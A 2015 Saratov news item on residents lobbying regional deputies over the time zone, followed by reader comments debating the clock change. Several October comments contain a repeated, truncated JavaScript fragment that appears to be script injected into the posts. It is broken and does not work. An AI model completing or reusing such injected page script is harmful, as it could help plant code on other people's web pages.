Саратовцы пишут депутатам письма с просьбой перевести время в регионе
НОВАЯ ПУБЛИКАЦИЯ
Тимофей Бутенко
Дедовщина
в контакте  |  facebook  |  twitter
СОЦСЕТИ
17.07.2015 | 15:17
Саратовцы пишут депутатам письма с просьбой перевести время в регионе
Просмотров: 1035
Версия для печати

Тема перевода стрелок в области все сильнее волнует саратовцев. Как пояснили корреспонденту ИА "Версия-Саратов" в информационно-аналитическом отделе Саратовской областной думы, в региональный парламент постоянно поступают письма граждан на этот счет. При этом часть обратившихся настойчиво просит депутатов перевести стрелки в области на час вперед, однако некоторые написавшие, напротив, хотят, чтобы регион остался в московском часовом поясе.

"Прежде, чем изменять часовой пояс региона, нам нужно детально изучить мнение его жителей. Референдум по этому поводу вряд ли будет проведен, однако говорить о каком-то социологическом исследовании можно. По его итогам областная дума может принять решение обратиться к федеральным депутатам с просьбой изменить ситуацию", - рассказали в думе.

Напомним, некоторое время назад саратовские общественники выступили за перевод времени на час вперед 

лента
новостей
ДОБАВИТЬ КОММЕНТАРИЙ:
Цитата
Количество символов:0
Внимание! Количество символов
в комментарии не должно
превышать 2000 знаков!
КОММЕНТАРИИ (14)
17 июля 2015, 20:11
Будут теперь год время тянуть с этим переводом, чтобы электросеть денег поимела с простых горожан, а то долги у неё бешанные. Собралась кучка пупов земли у власти и судьбу народа решают.
ответить
18 июля 2015, 00:54
Молодеж категорично против чтоб переводили стрелки вперед, темнеть начнет раньше, детям одним будет страшно возвращаться с учебных занятий и различных кружков, тем более большинство людей просто напросто привыкли к летнему времени, а его смена негативно сложится на здоровье большинства Саратовцев
ответить
18 июля 2015, 07:21
Просто надо вернуть как и было : зимнеее и летне время!
ответить
18 июля 2015, 20:40
Все устраивает. Менять время не надо
ответить
18 июля 2015, 20:42
И меня все устраивает. Прекратите крутить стрелки
ответить
19 июля 2015, 19:50
Ааа
ответить
28 июля 2015, 14:24
Во-первых, кто вам дал моральное право говорить от имени всей молодёжи? Мне 26 лет, я ЗА перевод обеими руками! Лучше даже НА ДВА ЧАСА ВПЕРЁД! Поймите наконец, что именно перевод стрелок НАЗАД, который состоялся 26 октября 2014 года и привел к СВЕТЛЫМ НОЧАМ И ТЕМНЫМ ВЕЧЕРАМ. Авторы петиции и предлагают вернуться нам на то время, которое и было в регионе на протяжении 2011-2014 годов. Я хочу, чтобы ЛЕТО БЫЛО ЛЕТОМ, и чтобы было светло до 21:30 КАК МИНИМУМ!!!
ответить
2 августа 2015, 18:10
писал:
18 июля 2015, 00:54
Молодеж категорично против чтоб переводили стрелки вперед, темнеть начнет раньше, детям одним будет страшно возвращаться с учебных занятий и различных кружков, тем более большинство людей просто напросто привыкли к летнему времени, а его смена негативно сложится на здоровье большинства Саратовцев
"Молодеж" должна соображать, что если перевести стрелки на час вперед, то наоборот, темнеть будет позже. Специально для современной молодежи: если сейчас темнеет в 19 часов, прибавляем час, получается в 20. Т.е. темно будет позже. Кому будет страшнее?
ответить
19 августа 2015, 00:46
писал:
18 июля 2015, 00:54
Молодеж категорично против чтоб переводили стрелки вперед, темнеть начнет раньше, детям одним будет страшно возвращаться с учебных занятий и различных кружков, тем более большинство людей просто напросто привыкли к летнему времени, а его смена негативно сложится на здоровье большинства Саратовцев
Так сейчас зимнее время и речь идёт о том, что бы перейти на летнее! Соответственно темнеть будет позднее! Не считая пары зимних месяцев.
ответить
21 октября 2015, 13:27
О каких итогах идет

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e
ответить
21 октября 2015, 13:34
писал:
21 октября 2015, 13:27
О каких итогах идет

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e
Написала, что думаю

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e
ответить
21 октября 2015, 13:37
писал:
21 октября 2015, 13:27
О каких итогах идет

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e
писал:
21 октября 2015, 13:34
Написала, что думаю

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Виктория, воспользуйтесь формой обратной связи (ctrl+enter) и напишите нам свой почтовый адрес. От вас приходят некорректные сообщения.

ответить
28 марта 2016, 13:42


Мне очень важно чтобы летом были длинные светлые вечера, а не солнечные ночи! кому нужны эти солнечные ночи!? Они только будут мешать нормальному сну!

Не хочу темноту в 15 часов зимой, и не хочу солнце в 3 часа ночи летом. Это ужасно, то что сделали сейчас!!!

Верните украденное лето!
ответить